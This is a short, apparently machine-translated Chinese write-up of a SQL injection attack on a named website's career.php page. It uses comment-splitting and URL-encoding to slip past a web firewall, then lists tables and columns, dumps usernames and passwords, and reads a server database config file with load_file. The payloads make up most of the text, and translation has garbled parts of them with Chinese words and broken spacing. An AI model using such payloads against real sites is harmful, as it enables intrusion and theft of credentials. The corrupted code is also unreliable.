waf过滤了联盟选择,从等关键词
1。列当前库所有表http://jyht.co.uk/career.php
?id=11/* *//* */* * 1=2//% 75% 6 e % 69% 6 f % 6 e/* */选择/* */1,2,3,4,% 28% 53% 45% 4 c % 4 f % 55% 45% 43% 54% 20% 47% 52% 50% 5 f % 43% 4 f % 4 e % 2 e % 43% 41% 54% 28% 69% 54% 41% 42% 45% 4 c % 5 f % 4 e % 4 d % 45% 2 c % 41% 30% 78% 33% 43% 36% 32% 37% 32% 32% 46% 33% 45% 29% 20% 46% 52% 4 f % d % 20% 69% 6 e % 6 d % 6 f % 72% 66% 61% 74% 69% 6 f % 6 e % 5 f % 73% 63% 68% 65% 6 d % 61% 2 e % 4 c % 54% 41% 42% 45% 53% 20% 41% 53% 20% 69% 20% 57% 48% 45% 52% 45% 20% 69% 2 e % 54% 41% 42% 4 c % 5 f % 53% 45% 43% 48% 45% 4 3 d % d % 41% 20% 20% 64% 61% 74% 61% 62% 61% 73% 65% 28% 29% 29日,6,7,8,9,10,11,12日,13日,14日,15日,16日,17日,18日
2。获取字段http://jyht.co.uk/career.php
? id=11/* *//* */* * 1=2//% 75% 6 e % 69% 6 f % 6 e/* */选择/* */1,2,3,4,group_concat (COLUMN_NAME 0 x3c2f62723e), 6, 7, 8, 9, 10, 11, 12日,13日,14日,15日,16日,17日18/* */% 66% 72% 6 f % 6 d % 20% 69% 6 e % 6 d % 6 f % 72% 66% 61% 74% 69% 6 f % 6 e % 5 f % 73% 63% 68% 65% 6 d % 61% 2 e % 43% 4 f % 4 c % 4 d % 4 e % 55% 53% 20% 77% 68% 65% 72% 65% 20% 54% 41% 42% 45% 4 c % 5 f % 4 e % 4 3 d % d % 45% 30% 41% 78% 36% 44% 36% 31% 36% 45% 36% 31% 36% 37% 36% 35% 37% 32
3。直接获取数据http://jyht.co.uk/career.php
? id=11/* *//* */* * 1=2//% 75% 6 e % 69% 6 f % 6 e/* */选择/* */1,2,3,group_concat (id、0 x3d用户名、0 x3d,密码,0 x3c62722f3e), 5, 6, 7, 8, 9, 10, 11, 12日,13日,14日,15日,16日,17日18/* */% 66% 72% 6 f % 6 d/* */% 6 6 e % d % 61% 61% 67% 65% 72
4。读文件可以不用十六进制,直接在页面显示(必须是根)http://jyht.co.uk/career.php
? id=-11/* *//* */% 75% 6 e % 69% 6 f % 6 e/* */选择/* */1,2,3,4,十六进制(load_file (0 x443a5c776562736974655c6a696e797568656e67746f6e675c6a7968742e636f2e756b5c636c6173735c64625f6d7973716c2e636c6173732e706870)), 6, 7, 8, 9, 10, 11, 12、13、14、15、16、17、18,,
